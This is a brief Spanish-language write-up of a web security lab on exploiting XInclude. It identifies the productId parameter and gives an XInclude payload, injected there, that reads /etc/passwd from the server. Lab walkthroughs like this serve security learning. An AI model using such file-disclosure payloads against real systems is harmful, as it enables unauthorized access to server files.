b0ysie7e

Appearance

20251117143009.png

Lab: Exploiting XInclude to retrieve files

Al interceptar la request podemos observar que este envia dos parametros que son productId y storeId

20251117143146.png

Para poder leer el archivo /etc/passwd usaremos los siguiente payloads, que ingresaremos en el parámetro de productId.

c
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

20251117143607.png

Podemos observar que logramos leer el archivo /etc/passwd